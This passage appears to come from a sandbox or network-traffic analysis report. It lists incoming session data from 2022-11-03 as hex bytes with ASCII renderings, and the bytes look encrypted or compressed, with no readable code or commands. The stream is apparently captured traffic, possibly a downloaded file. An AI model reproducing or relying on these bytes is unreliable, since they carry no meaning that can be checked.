2022-11-03 06:22:07 UTC	63	IN	Data Raw: c5 ca 95 d0 56 de 28 54 a8 8e 9c 09 d4 e8 d8 0e 4a ca ee 87 18 1d 9b f3 1c 57 d1 6b 41 ee c8 f9 0d 98 47 24 a0 3f 43 eb 42 ba d4 03 3c 6f d7 e5 2a 42 31 49 7c 62 32 94 e9 f5 c1 a5 ee 2c e8 f2 fa 71 6a b5 3f 91 5b fe 10 ba 7c 63 70 d5 80 c8 1d 06 b9 ea 70 5d 3c d8 67 1c fa d8 06 9b d6 8e 3f e6 b5 68 7d e3 c1 d6 dc 50 ea 44 d5 a4 d5 20 a0 c4 94 1c 8c ed ba 18 09 82 74 68 14 e2 7b 07 a3 82 fe c6 ee e3 e4 66 ba ec b9 7c c9 6c bc a3 61 a2 59 6d 48 55 20 d9 29 57 31 e8 5c f7 eb da 39 24 b5 e3 a7 3c 06 0e 5d d4 e1 a0 e7 2e 57 e1 06 ba 87 39 50 05 af cf 19 f9 9b 2e 51 60 87 14 da 22 fd 9a d2 82 8f d7 86 71 ec 73 b5 e5 d5 95 ab 2f b8 79 d7 04 34 3a 3a 1a 34 d6 bd d5 5f 6f 80 5f 26 4e 6b ab 96 53 57 60 ec 2f dc 29 aa a4 16 96 bb 0e 17 32 54 ee 5c 37 4c 23 2d ea bc Data Ascii: V(TJWkAG$?CB<o*B1I\|b2,qj?[\|cpp]<g?h}PD th{f\|laYmHU )W1\9$<].W9P.Q`"qs/y4::4_o_&NkSW`/)2T\7L#-
2022-11-03 06:22:07 UTC	64	IN	Data Raw: f4 5c 05 d1 ad 48 05 1d a5 4c cd b2 b8 c7 ec 5d 1f 7b ec 18 8d 92 e0 dd c4 d8 ec ae 6b 84 e4 09 ff ad 74 c1 d5 76 1b c4 bf 61 a1 63 2a 6f 47 66 44 1f 01 29 72 59 ac 36 4e 59 0e 1f 86 22 15 b6 19 ae e7 61 d7 5e 6c 4c 52 48 70 f3 39 48 f7 e3 3b 33 c5 d3 88 50 aa af 81 4f 9c f7 29 cb 25 28 c8 33 70 f8 b6 85 3a 86 fd a9 f9 ed 6a 0e 5d e3 76 79 39 2a 54 0f ba 22 91 fd 12 c9 00 9d a7 30 4c be 62 12 e9 ad 71 00 85 17 3b 3b ca dd 26 ee c6 8c b5 87 bb 30 23 68 74 a6 70 27 79 a1 92 24 ee 3d d4 48 e6 2f 61 78 1b c0 8a 0a 55 f9 70 52 23 73 e3 72 d4 36 f5 1c 51 d1 b0 00 c2 fe 85 cd aa 7d 15 cc bb 13 b4 ff 88 27 bd 10 75 48 b5 4e 30 f7 cf 08 e5 0d 4b ea 79 ba f8 99 ab e2 09 7d 0c 22 e6 9a 61 cb 0a 44 78 b6 88 38 11 b4 54 72 e0 e1 99 11 18 eb 4a d4 26 70 a4 a0 2e 53 07 Data Ascii: \HL]{ktvacoGfD)rY6NY"a^lLRHp9H;3PO)%(3p:j]vy9T"0Lbq;;&0#htp'y$=H/axUpR#sr6Q}'uHN0Ky}"aDx8TrJ&p.S
2022-11-03 06:22:07 UTC	65	IN	Data Raw: c6 9c 15 3c 99 bd 11 b2 f8 c4 8b ca ec a8 c4 cf d7 21 15 1e 02 48 e4 6a 86 c1 b5 7d bf 5c 52 2d a7 ef bc 9c 8d d5 56 c4 c1 41 5e ec 4b 18 e0 90 6f 1f 15 a3 55 41 72 c9 b3 b7 0a 4c b8 a2 cc 74 ff 49 36 d7 4f dc 37 dd 71 2e b1 fd 26 7d ee 37 22 c1 b9 cb 21 ef b1 8c 38 fa f5 68 e1 7d a0 5b Data Ascii: <!Hj}\R-VA^KoUArLtI6O7q.&}7"!8h}[
2022-11-03 06:22:07 UTC	65	IN	Data Raw: 6f 12 e0 d2 3e 71 74 81 3b 26 bf b9 c3 73 3e aa 41 6c cd fc af f4 19 dd 87 38 15 3e d1 7d 32 c0 5f be dd e1 75 d3 57 2a 99 a0 15 97 bc 26 54 b1 bc 0d 71 73 57 14 4e 7a f4 ec bd fe ef ea 57 3e 52 b8 e5 ba b8 cb 44 be 4a 61 a1 37 2a 4d 4c 27 31 c8 a9 31 e1 5f 2e 11 83 35 bd b7 04 49 60 0a 17 5a 27 db 66 e7 77 53 4e 5e fd 8b 80 53 f8 39 04 1b 40 98 2a 74 63 82 b8 db 9c bd 5d d9 36 8e 1b 1a 85 e7 cf b4 a7 ff a2 ab 9b ba 8a e3 61 35 5e 3b a4 74 aa b7 11 5d a3 2c 69 26 e2 68 d4 1e 34 5d a4 e8 dc 48 4d ab 1d 15 87 9e c3 1b a3 57 f1 55 c7 40 8f 2e c4 d4 7d b2 dc c3 f7 b3 52 27 e7 fb 2a 64 8d 05 84 0c 36 eb 77 fd 55 cf 2d 48 0b 71 48 54 7f 22 d7 34 df 47 dd 7b d6 c4 e3 c8 7c 49 f1 43 93 f7 f9 45 a9 b5 fb 09 8b eb 21 3b 07 fa 9d c5 c1 16 d7 a3 b0 15 22 fa 12 10 20 Data Ascii: o>qt;&s>Al8>}2_uW&TqsWNzW>RDJa7ML'11_.5I`Z'fwSN^S9@tc]6a5^;t],i&h4]HMWU@.}R'd6wU-HqHT"4G{\|ICE!;"
2022-11-03 06:22:07 UTC	67	IN	Data Raw: b5 52 a4 71 bf 45 94 fc 0a 3e c0 da 2b 88 49 ae 00 10 48 9d 16 2f 1a b4 de ce 2a 74 45 5f 61 37 0f fd 1b 26 5f 6b 87 5c 51 4d 78 2b a3 52 bd d1 d4 97 6c 10 04 41 a2 a7 e9 48 6b f3 8b e8 ac 71 e0 08 14 29 d7 cb 4a d5 35 cc 05 b5 35 64 08 22 e1 77 14 4b 2b 6b 28 92 96 e9 98 d5 c1 e7 9d 02 69 09 49 8c b8 1a e1 62 db 24 c1 21 5a d0 bf f6 ae ee cd a2 89 c1 4c 6a ae b8 f4 15 7e 70 75 a6 76 89 95 6a 7d 67 c1 b6 fc 03 87 dd 81 e5 bf 54 9d 6b 43 f8 6b ca df 09 84 0f de bb a7 61 3a 08 43 c0 88 88 c9 14 b9 dc 4c e0 10 99 e3 90 ea 4a 25 26 8c 7d 9e 2e b2 07 f7 00 73 d3 b9 e7 17 2f f7 8e b2 87 bf cd 2a c5 7b d0 88 7e d8 3e 6d af 2d 36 eb 35 ee 7f 63 be bf f0 99 0b 31 ad 90 cd a1 24 d8 c4 0c ca da 41 e8 06 ae 3e 35 cc aa 53 07 7b f9 81 e2 97 fe 95 47 0a 1c 04 13 86 e9 Data Ascii: RqE>+IH/tE_a7&_k\QMx+RlAHkq)J55d"wK+k(iIb$!ZLj~puvj}gTkCka:CLJ%&}.s/{~>m-65c1$A>5S{G
2022-11-03 06:22:07 UTC	68	IN	Data Raw: cc e5 7c 45 74 1d 67 62 65 93 4b a1 d2 a4 a6 2b 65 a6 e1 71 3a b2 b6 c5 40 fe 41 bd 19 36 63 d5 cd cf bc 53 a2 ea 27 5a 81 8d 74 1c b5 df ff ce c5 8e 77 e1 84 3d 66 e3 92 d1 b6 05 f9 45 9e a3 f0 75 b3 c4 de 1b 4d b7 a1 18 5f 85 aa 32 07 e3 33 00 16 d8 ed c6 a5 e4 75 3c a1 ec ea 7b 60 37 af a3 2a a5 9f 36 5b 54 68 de f4 0c 22 e8 14 f0 79 87 02 25 e3 eb e1 63 15 0f 15 d3 33 ff a4 2f 37 e9 b4 e5 2c 39 18 02 11 91 02 f8 f8 29 5b 3e 9c 14 89 25 90 c4 89 82 c7 d0 50 28 ff 72 fd e2 57 cf b8 2e f3 7e 69 5e 2f 3a 69 1d fe 8c a6 d4 3f 68 c6 04 35 4f 21 ac 34 08 44 61 a1 28 21 63 09 a4 5e 91 f2 44 bc 32 1f e9 19 7d e7 23 67 ed 7d 5f 13 70 8a 67 19 31 8e 4b b2 14 ef d7 a5 28 45 7d 02 2d 5d e9 86 60 a3 d7 d9 e4 1d 2c e9 a8 9f a3 0e 29 e1 9b df ea 98 5c 65 31 5c df be Data Ascii: \|EtgbeK+eq:@A6cS'Ztw=fEuM_23u<{`7*6[Th"y%c3/7,9)[>%P(rW.~i^/:i?h5O!4Da(!c^D2}#g}_pg1K(E}-]`,)\e1\
2022-11-03 06:22:07 UTC	69	IN	Data Raw: 62 f8 47 1f 06 29 4c c7 aa 36 4c 59 44 81 94 22 00 b6 7a 30 fd 61 cd 5e d2 d2 4b 48 6d f3 f5 d6 ea e3 23 33 de 4c 91 50 b4 af b9 d0 bc f7 32 cb 39 b7 d1 33 55 f8 cc 1a 1f 86 dc a9 aa 72 49 0e 79 e3 c1 e6 00 2a 68 0f 41 bd a9 fd 28 c9 c9 02 9b 30 75 be 7e b2 d1 ad 4d 00 80 b7 04 3b f3 dd 3f 4e fe 8c f6 87 f6 90 61 68 4d a6 a2 87 41 a1 90 24 53 9d dc 48 5b 87 a8 d8 0b c0 95 0a 6a f1 70 52 26 73 96 5d 0e 9e f4 1c 54 70 81 00 19 56 c0 6c aa 7d 24 cc 00 1a 33 ff d9 2e da b1 16 41 a8 4e ca 5f 48 08 6a 04 73 48 2d ae 34 9a 07 56 0b 7d 2f 21 08 3b 40 c8 09 0a 10 7a e7 7b 7a c6 08 f0 a3 8d f1 74 4e 02 4a 9a 46 1e a2 41 41 21 60 61 ea e1 b2 3d 8b 70 b0 95 f2 4e 85 21 a4 92 b8 90 be 53 b6 b9 75 85 ce 42 e8 a1 5b 11 09 b3 42 23 89 6d 68 2f 5f f4 ad 89 45 2b 8d 1c bf Data Ascii: bG)L6LYD"z0a^KHm#3LP293UrIy*hA(0u~M;?NahMA$SH[jpR&s]TpVl}$3.AN_HjsH-4V}/!;@z{ztNJFAA!`a=pN!SuB[B#mh/_E+
2022-11-03 06:22:07 UTC	70	IN	Data Raw: 0d f5 86 72 32 7a 5f 23 82 ac 99 2d ce 0c 41 db 69 0f d1 37 df 87 62 1c 4b b7 d7 2e 0e 3d 6c 08 02 06 94 39 d6 a4 d0 8a 4c 14 a4 b2 10 1b dd a2 a6 39 92 76 ba 2a 4d 03 a1 e1 a5 12 12 d6 86 19 38 62 fb 0e 73 92 ab 5f 8f b9 e3 4e 89 4a 5a 13 97 c0 85 6c 74 9e 21 ba 8a 73 18 cd b4 f8 72 e8 db ce 55 62 e6 0c 5c 14 a7 1e 6e 82 b5 8c 84 9e 8c e2 4d db 8e d4 19 21 40 c8 d1 0a c0 e9 41 2d 55 64 bd bd 7b 5e 9a 1f 85 d5 f4 4a 45 d6 8f 87 35 72 6f 28 b1 70 b9 88 40 25 8e 9b 85 87 7d 30 71 f7 c0 70 94 ff 2e 9c 5e e4 7d b6 43 78 c1 96 e7 e2 b2 d4 4c 98 16 b4 a1 31 ab de 48 dd 1c 38 1c 5d 49 4b 76 bc f3 fc a1 29 1d ec 60 53 3a 0d ab e4 77 24 14 8d 42 cf 30 c3 c5 70 f8 5d 20 63 5b 35 9d f9 2e 29 41 5b 8d 1a 22 ca 38 aa 04 7d 4c 43 0a 8f 67 bd a6 6c 5d 78 1f 42 71 93 8b Data Ascii: r2z_#-Ai7bK.=l9L9v*M8bs_NJZlt!srUb\nM!@A-Ud{^JE5ro(p@%}0qp.^}CxL1H8]IKv)`S:w$B0p] c[5.)A["8}LCgl]xBq
2022-11-03 06:22:07 UTC	72	IN	Data Raw: f0 b4 39 90 aa 8c ca 66 74 85 7b 96 ec 84 28 a7 1f 78 b1 ce 9a a1 20 44 01 15 8c 36 6a 60 5d 20 b5 e5 58 29 36 57 c5 e3 44 76 c3 00 44 aa 04 b9 3c ac a0 13 3c 05 81 85 b4 82 97 5f 33 8d 29 e5 32 ce dd e9 be fa 98 2b 86 7d c3 a0 5c 15 ba 8e 69 5f 86 af c8 fe 13 07 6b 2a 86 95 af 57 4c 3f 0f 2f dc e3 9a 76 bd b8 6c d1 5f 2e df 37 db 86 c3 36 78 db d2 4b 4f a2 b2 11 4e 94 e9 c4 e8 a2 e6 46 2d 03 c3 8f f3 38 d3 f7 57 43 cf b1 3b 8a 43 de bd 5e b6 eb 64 c4 11 11 3c 42 1f ee 2f d4 75 9b 71 34 19 dc 61 b7 97 af 02 f8 18 7b ad a2 d3 c0 96 e4 49 b3 f0 01 3c c6 27 cb 23 bb 6d e7 5e 87 38 0d df 94 b7 28 36 67 09 67 4f 6e 15 22 a4 64 34 18 78 ed 4a 46 d1 1f a6 89 82 fd 62 20 35 25 b9 57 19 a1 67 5c 14 60 2f cc ff ba 2c 80 60 df 84 fe 59 ec 2e a2 85 b2 e2 80 4f ba cd Data Ascii: 9ft{(x D6j`] X)6WDvD<<_3)2+}\i_k*WL?/vl_.76xKONF-8WC;C^d<B/uq4a{I<'#m^8(6ggOn"d4xJFb 5%Wg\`/,`Y.O
2022-11-03 06:22:07 UTC	73	IN	Data Raw: e1 f0 04 70 b2 a3 bb eb 56 88 42 3d 91 db dd 79 a5 84 04 3e 2b be 85 e8 df 48 d8 9c 71 23 7a 51 2d ee 8d 90 7d a2 28 43 f0 5a 1d c8 2e ce d7 45 1a 4b ba e5 68 2d 26 72 3f 0e 58 e7 01 cd a6 e0 99 49 4b d0 bb 03 0f c6 d6 81 34 8c 7e f9 15 5b 03 bc ea af 79 27 dc 84 01 15 60 e1 03 70 99 aa 5f 8a b9 fc 53 b1 4d 51 19 8c b7 85 61 66 9e 21 d7 e9 55 04 d3 a5 f0 79 cf da c2 18 40 e7 1a 43 75 85 1f 45 99 a2 bc b3 98 97 fa 50 c9 ec f5 19 13 47 dd c4 06 e0 f3 4d 0c 30 47 b8 a1 63 45 aa 28 83 ce ec 57 24 f9 86 91 15 67 69 39 96 1f 82 ae 4d 39 8f f7 ad e2 4a 22 64 f5 f1 5b 96 e2 61 a8 4f ee 7b b5 51 14 fd 9f ed ea a2 df 48 d2 73 97 d8 25 96 9e 47 d7 33 12 31 59 08 7e 5d ec eb df a2 6e 24 ef 77 1e 20 25 cd d1 56 13 29 8a 43 d4 1a cb 90 6d ce 43 30 7b 41 04 a5 a6 19 71 Data Ascii: pVB=y>+Hq#zQ-}(CZ.EKh-&r?XIK4~[y'`p_SMQaf!Uy@CuEPGM0GcE(W$gi9M9J"d[aO{QHs%G31Y~]n$w %V)CmC0{Aq
2022-11-03 06:22:07 UTC	74	IN	Data Raw: 11 60 3f a8 b8 29 4c b4 29 ba 71 7b 94 1a 61 7f d4 ac d5 5d 34 db 9d 57 de a5 a9 10 90 81 9d 97 72 51 b0 70 9c c9 8a 09 9e 11 4f 9d dd c2 9c 63 08 52 17 b7 3c 7a 55 1e 22 b0 d8 7c 1b 6d 16 c9 b5 6a 63 f4 1d 7e b2 39 a3 63 f4 d2 71 75 00 84 ab 9b bb 8c 73 71 99 20 e7 24 e6 99 e5 f4 e5 c5 60 9f 59 c2 99 0e 4c f8 cc 27 4b df c6 e7 d5 40 0d 67 39 b3 94 8c 01 72 64 4c 22 c5 a1 a8 50 9d c3 74 e0 5c 3c d5 24 c1 98 9b 34 75 fb 85 5d 6c ba 8d 4c 18 a9 ef 8a 87 ed ad 52 05 39 f2 95 fd 41 ee d5 60 31 f6 ae 0e b1 55 f1 b3 52 9f ca 6d 81 3d 06 19 51 1a cc 2a ed 54 98 52 27 2a e3 55 9c af b1 21 d9 1a 2a cc f9 8f c5 91 c9 11 91 d6 0c 1e fa 07 fc 1a eb 5d 96 3d b9 0f 4a ca cc fd 4d 0f 79 1c 48 78 7d 73 13 89 3a 2e 22 65 e0 4e 26 db 5a a1 8c a4 a5 11 03 4b 3b b0 68 12 b7 Data Ascii: `?)L)q{a]4WrQpOcR<zU"\|mjc~9cqusq $`YL'K@g9rdL"Pt\<$4u]lLR9A`1URm=QTR'U!*]=JMyHx}s:."eN&ZK;h
2022-11-03 06:22:07 UTC	75	IN	Data Raw: d2 cf ba 31 21 a1 3b b6 9e c6 d3 e7 5a 20 81 f8 0a ea ad 2d c5 45 d3 59 0c 8d 82 0a 3a a4 a2 91 ed 3b b9 7e 3b b3 a1 ef 6f b9 9a 2b 13 24 85 bd f4 f2 03 ad b6 22 57 2b 03 30 a5 b8 bc 2a a4 26 76 e9 4a 5b d7 08 cc 9f 6f 4d 6b a0 9c 59 1a 05 5b 0a 56 5f cb 0e 91 88 f6 aa 4d 6d ef a5 2e 2c c7 b2 a3 7f b3 2e ba 5a 09 01 84 f0 bf 5f 0e d0 dc 00 2b 37 bc 2f 6f d8 b9 10 be 86 c2 46 94 69 6a 44 8f 8d 8e 77 6f b8 13 e0 9d 7e 36 ee 9e e5 4e f5 da c0 6f 30 82 4a 0d 65 b0 32 63 bb a2 88 f3 94 ae e7 57 ca d9 d6 35 53 51 f4 f6 50 fb a9 07 26 1f 18 9d bc 48 6e a1 30 a6 ec ec 73 4c 90 8c 8d 13 76 65 61 d4 53 c7 96 5d 17 84 9d b0 ec 55 64 53 a4 d6 2a 97 ea 5f ee 53 e8 79 a2 77 55 fc ef 82 ca b9 c0 7f 89 10 db 97 30 c9 e8 43 d3 1c 24 2c 78 55 5a 7e b8 f8 fb ba 2f 02 85 41 Data Ascii: 1!;Z -EY:;~;o+$"W+0&vJ[oMkY[V_Mm.,.Z_+7/oFijDwo~6No0Je2cW5SQP&Hn0sLveaS]UdS_SywU0C$,xUZ~/A
2022-11-03 06:22:07 UTC	76	IN	Data Raw: 52 36 9a 82 a3 a3 ee e5 da fa 14 ee fc 36 49 b6 a3 f0 23 ca 14 ec 6c 17 73 34 73 0d aa c9 61 07 96 74 a0 4d 7c d5 24 56 41 dc a2 e8 7e 2a 97 a6 42 c0 f7 89 34 ac 99 8b de 6a 5a 93 39 ac db aa 3e e2 1e 6e 85 87 c2 a1 37 44 3c 12 8a 2d 71 64 29 6c fa dd 12 79 08 08 f4 b7 1b 51 de 20 14 90 2f 9b 2b a7 eb 13 0a 55 b0 bd eb ca e3 19 0e b1 0d e3 3b c1 df f9 e6 d5 bf 71 b8 6b fe bb 62 48 90 ae 62 40 d2 88 94 b1 72 49 33 2f d1 ab ae 70 79 23 7d 4d d2 c7 8a 43 a3 88 70 e4 02 0c f8 17 f6 db f2 30 64 f9 d8 4e 70 fd ed 0f 0a ad e3 e3 f4 fe f5 45 3a 26 f3 dc 87 5a 9c e1 61 28 a9 e6 0e a4 4e f0 b3 69 8e c7 7f 82 0d 20 65 10 3a ea 36 95 0b c9 1c 67 4d c1 34 a7 da 8e 08 da 3a 54 81 b9 fe 87 ab ea 6a ac e5 4c 0d e3 78 90 10 ae 6b ae 7b b0 25 08 fe a9 d4 3c 0d 60 0e 69 65 Data Ascii: R66I#ls4satM\|$VA~*B4jZ9>n7D<-qd)lyQ /+U;qkbHb@rI3/py#}MCp0dNpE:&Za(Ni e:6gM4:TjLxk{%<`ie
2022-11-03 06:22:07 UTC	78	IN	Data Raw: 19 d5 01 f7 65 d0 e0 83 7b d6 d5 59 9b 4a 49 64 bc e4 22 cb ad 19 8e 94 13 c5 8e a7 17 36 c3 78 f9 ca d2 fb c6 3c 0b 84 b4 01 c6 9a 17 95 4d f4 6a 11 a3 d3 08 6e a5 af a6 d6 33 aa 59 3d 9b bc ef 09 f6 d5 1c 0a 1b 9f 8b ea c7 3b cf 89 75 66 3d 49 12 84 9e a8 54 94 29 4a c5 02 53 bd 61 87 a6 79 0f 77 82 84 47 28 04 73 09 32 4e d8 0e da b9 d2 ab 63 47 dc 8d 4c 55 b5 94 a2 3c 97 7d f3 17 42 1f be e1 c8 1f 6c c8 da 33 0c 5e df 0e 7d 9b 80 17 a1 89 cc 06 87 63 07 37 8a f9 92 62 3a d7 44 f4 99 41 35 94 b7 d6 6c e8 f1 c3 72 4a fa 2b 59 62 aa 36 70 a4 e9 b8 92 a6 86 ff 79 f8 80 da 15 08 07 d4 d1 50 c4 af 61 1b 62 63 9f b6 56 0c e8 7e ca cb d4 7f 61 c0 97 b5 50 5f 3c 35 f0 3c b9 d0 71 2c ad b4 ae e3 7f 12 6c da e0 49 b1 ab 57 8a 02 bf 63 ec 76 76 ac a0 d1 ba a1 e6 Data Ascii: e{YJId"6x<Mjn3Y=;uf=IT)JSaywG(s2NcGLU<}Bl3^}c7b:DA5lrJ+Yb6pyPabcV~aP_<5<q,lIWcvv
2022-11-03 06:22:07 UTC	79	IN	Data Raw: 97 a0 c7 a5 82 10 fd ba 7b 5d b2 e2 45 1f b0 df eb 65 23 4e 43 ce ba 0c 06 60 3b 9e c5 c3 a6 ab bb f1 e0 33 9c 93 00 3f f2 bf e7 44 f2 3a c7 53 16 19 69 61 22 af 81 68 58 a9 79 b3 67 74 c0 1d 28 13 b8 e4 d5 2c 2e de 84 55 ee f5 8e 26 f0 be af fc 30 54 af 6c 9c e0 c4 29 84 3f 3e 9d e8 b3 f0 07 62 1d 57 9a 2d 46 5a 6f 7a f4 9a 0f 2c 0e 6f bc 86 01 2a c7 2f 49 b8 32 a0 26 a8 b3 3c 19 18 9c a3 85 b0 b2 03 7f a9 21 cb 16 92 f0 f7 a9 a5 b6 66 89 56 fc ab 5f 03 b1 a6 4f 73 b6 be fe ff 4f 6a 2d 63 92 8f b5 72 4b 21 36 22 ea a5 bc 4c a3 90 32 f2 73 7a fa 2a d4 84 da 4e 3d b8 94 06 4a 81 b8 4b 0f a9 fc 81 cd fc fb 7c 0a 3e 96 87 a3 11 f2 a3 7e 0c cc e9 75 e5 48 cd ac 44 83 e1 64 de 3c 13 26 43 17 8b 1e b8 59 87 79 14 19 c0 65 c3 dd fd 1d ef 15 61 a9 af e8 f7 97 f3 Data Ascii: {]Ee#NC`;3?D:Sia"hXygt(,.U&0Tl)?>bW-FZoz,o/I2&<!fV_OsOj-crK!6"L2szN=JK\|>~uHDd<&CYyea
2022-11-03 06:22:07 UTC	80	IN	Data Raw: ac e6 91 7b d5 6f 00 c7 d1 a1 4d 9b ad 4d ed 20 6f 9e 17 0f e7 76 ba fd d5 45 c4 5a 8f 7e a3 88 c2 68 a3 da 07 e2 69 46 76 af 85 08 c8 a7 45 ec db 4b c7 e4 81 36 77 f6 58 ca 9b fc f2 8b 17 4a be af 29 d9 bb 25 e3 5a d0 23 73 e1 85 5c 73 ab f2 b0 cd 0e 91 46 32 ad ea d4 64 9c ae 06 29 06 8c 8b c1 f3 06 e9 83 5b 3f 4b 79 06 a4 a2 c9 4e 9e 0d 4b d2 7b 21 dc 00 c3 e7 3e 75 1a ea 94 41 05 1c 4e 0f 29 5b ce 5f c9 8a 81 b6 49 71 c1 b8 01 12 f1 98 9e 02 b3 27 e0 48 72 39 a7 cb b8 64 30 fd bc 51 0b 55 ce 03 7a b1 e5 5f ef eb ff 59 df 43 68 08 ab a7 a0 74 66 dc 27 9f c3 09 00 ca fd d9 4f dc e4 87 25 0d a1 54 41 41 98 36 30 a5 85 ce a3 b4 aa fe 5c cd b8 d7 12 54 75 ef fc 34 e3 a1 08 48 76 1c a8 81 4b 60 8b 29 af c9 e4 4e 17 d1 a4 9a 17 65 57 1d ac 20 c2 aa 7f 6b dc Data Ascii: {oMM ovEZ~hiFvEK6wXJ)%Z#s\sF2d)[?KyNK{!>uAN)[_Iq'Hr9d0QUz_YChtf'O%TAA60\Tu4HvK`)NeW k
2022-11-03 06:22:07 UTC	81	IN	Data Raw: db 84 72 8f 6b 13 29 0c e3 46 60 e3 b8 41 30 9a ea c0 be 40 6c 6d 00 6a e1 aa 94 e4 a2 97 6d 83 a5 15 21 87 a2 01 2a c2 f6 82 21 4d 7b 17 a6 fd 20 64 7f 34 a2 ed ed c7 ce bf c2 fc 2f e0 cc 78 7e 85 be e3 53 e4 6e b3 1b 13 32 29 63 14 87 81 39 07 f2 2c a5 51 56 ec 3e 6c 4c ee 94 db 2d 70 b0 d8 6d d6 a6 93 0e b0 a8 de c9 3e Data Ascii: rk)F`A0@lmjm!*!M{ d4/x~Sn2)c9,QV>lL-pm>
2022-11-03 06:22:07 UTC	81	IN	Data Raw: 24 e4 2a c0 dc a6 68 b7 25 43 fd 8f b9 f8 5b 68 3f 1c c0 11 28 46 53 35 ac fe 51 72 64 57 d3 e3 4f 78 c0 09 66 86 0d a1 3b c9 f1 6f 39 46 aa a9 90 84 b1 7b 02 f9 16 fa 28 e0 fb e2 b5 d0 d3 52 fb 7e d0 f5 0e 71 bd 81 6e 48 ff ba d1 e5 01 1e 7d 5e a4 82 92 7c 44 24 7d 12 d8 e2 fd 30 f4 80 30 c0 44 25 c8 01 84 db c3 43 37 de ee 6d 6f b3 e8 19 39 8f fd cf c5 8f ff 12 1c 2a ce 92 a3 10 cd a9 65 20 b9 e0 0e bc 70 ef af 26 c0 ad 37 c1 2b 45 23 56 05 c4 0d ba 7a 8c 50 34 46 d1 47 a8 98 81 21 9d 0a 46 f1 e7 b2 97 c2 fa 11 f5 cb 1b 0e d3 7e f6 64 fc 3c 89 6b 90 23 35 8e b0 a1 03 11 5a 34 43 66 7b 5f 0b 8a 66 37 13 6e ed 7c 73 cd 3f 8a b6 b6 a8 29 1d 76 69 e9 56 0a a7 70 4b 34 3d 3b 99 c9 ef 1a b5 76 e6 c4 d8 53 d0 06 95 9e 86 df ef 3a f7 84 49 db 94 69 c2 e5 5e 1c Data Ascii: $h%C[h?(FS5QrdWOxf;o9F{(R~qnH}^\|D$}00D%C7mo9e p&7+E#VzP4FG!F~d<k#5Z4Cf{_f7n\|s?)viVpK4=;vS:Ii^
2022-11-03 06:22:07 UTC	83	IN	Data Raw: 38 af 7f 6c 97 b3 c5 3f 81 af 1c 64 2b 98 87 ba b1 6b a6 82 76 08 72 06 72 bb bc 98 4d 94 26 12 f7 4c 36 fe 03 db bf 61 21 68 ea d8 2e 61 69 6e 1a 12 79 f7 39 9b 88 fc 80 7c 77 ed ab 16 3e d6 89 a9 19 98 4b c0 2f 5e 08 83 ca fa 52 08 e6 87 33 27 25 df 04 58 a4 b9 14 87 a1 b3 3e c5 19 4e 59 bb b8 a7 67 4e a2 73 b3 dd 69 06 c1 a7 da 66 df ea f9 72 4a c3 5c 7a 55 b0 4a 71 a3 91 97 b7 dd 85 a5 7a fc 9d eb 4d 0d 57 f5 9e 63 81 a1 44 79 21 6d 94 e1 48 5a d8 6d c6 f3 c7 7c 70 de d0 b0 0e 4c 3c 19 87 11 b3 88 1c 0e 86 96 b6 b5 4f 1c 52 fa e5 50 aa eb 7d 90 42 bf 29 db 01 29 b0 e7 cf fa ad dc 69 bb 3d c0 89 3f a2 d8 49 ea 2d 02 2b 01 4b 63 76 96 b8 d6 e2 07 0a ed 49 43 20 31 d1 f3 44 06 12 8f 4b ae 3d e3 99 17 b5 0f 22 6e 7f 72 8b 88 58 1d 65 6a 80 34 30 f6 0a bb Data Ascii: 8l?d+kvrrM&L6a!h.ainy9\|w>K/^R3'%X>NYgNsifrJ\zUJqzMWcDy!mHZm\|pL<ORP}B))i=?I-+KcvIC 1DK="nrXej40
2022-11-03 06:22:07 UTC	84	IN	Data Raw: 11 f7 38 6c 96 1d 5e 68 fb a5 8e 6d 62 b9 a5 68 da a7 91 13 8b 8f a2 c2 27 48 d9 34 fd 8e cd 2d f1 33 2f f0 d4 aa eb 06 5a 2c 53 92 11 4d 53 1d 20 84 fe 63 76 3e 6a bc 86 01 2a c7 54 45 aa 26 97 6f f0 83 16 7d 26 b4 96 a6 9c 99 6f 7c b5 7c db 01 96 92 a0 f3 a1 86 58 f9 28 85 90 74 2e b2 97 6a 78 f1 8f e2 e4 02 1e 41 04 8b b5 a7 04 17 50 2c 46 cc c7 ac 7c 93 9d 65 f5 05 74 e1 35 86 a7 f4 3a 61 8c f4 79 6b 9a aa 42 73 c6 af 8a f6 bc a9 4e 51 30 cc 94 de 38 f1 b4 16 06 ae a4 7a 9d 4e cc be 5d a8 ed 5e f8 6f 04 3d 67 1b f9 30 e4 52 98 7a 0b 24 dc 64 aa a9 92 1f ce 25 73 f4 8f df da 94 d9 4c 99 c3 23 17 8c 6a 98 31 ae 49 e7 2e c3 3a 3b ca 83 fc 1d 31 3f 25 74 49 66 4f 16 8a 45 22 46 7f c3 68 5d e2 5e 82 ba b7 d9 46 79 3a 28 8d 62 47 f4 52 47 14 37 3b f1 d4 a8 Data Ascii: 8l^hmbh'H4-3/Z,SMS cv>j*TE&o}&o\|\|X(t.jxAP,F\|et5:aykBsNQ08zN]^o=g0Rz$d%sL#j1I.:;1?%tIfOE"Fh]^Fy:(bGRG7;
2022-11-03 06:22:07 UTC	85	IN	Data Raw: d4 c5 ad fb 00 1c c2 f6 27 c1 8f 37 cf 5d dc 2d 23 ae d0 07 76 b3 bd e9 85 75 e3 5c 3f 96 8d f7 43 a6 83 18 1a 0b fe 83 b0 da 0f ee bd 28 6e 61 0f 36 d3 f4 f9 3f f3 36 40 91 76 1a d9 73 ff 9b 47 25 71 9d 9d 46 0e 22 6b 4c 1b 06 da 39 9e fc a5 cc 11 54 fc 91 16 18 d3 b1 af 2d aa 58 fe 23 73 1c 8d c6 8f 75 65 c1 d3 03 38 50 c0 53 56 9a b2 19 fb 91 d9 0c a3 67 48 44 c7 8c e5 50 71 93 0f 8d e3 7f 19 da ad e0 44 c8 87 e2 6a 3c c7 02 40 46 95 1f 07 d5 e7 8f ab a0 d1 dd 0b eb 8b cb 4a 16 42 8b 9a 0e e1 ed 66 6c 21 12 a8 b3 32 0c e8 7e ca cb c8 4d 6e e0 a8 a7 0d 48 68 6e b9 3a ac af 4d 0c 9b a4 b7 bf 50 00 4c f1 e7 5b 9e f6 54 bb 71 cd 5b b0 7a 23 97 8d f7 cc e2 86 5a d1 73 97 d8 25 f1 e9 5f 88 4e 2c 30 40 48 63 57 b0 e5 d3 9b 25 09 a1 3b 57 02 0a de e6 5f 32 08 Data Ascii: '7]-#vu\?C(na6?6@vsG%qF"kL9T-X#sue8PSVgHDPqDj<@FJBfl!2~MnHhn:MPL[Tq[z#Zs%_N,0@HcW%;W_2
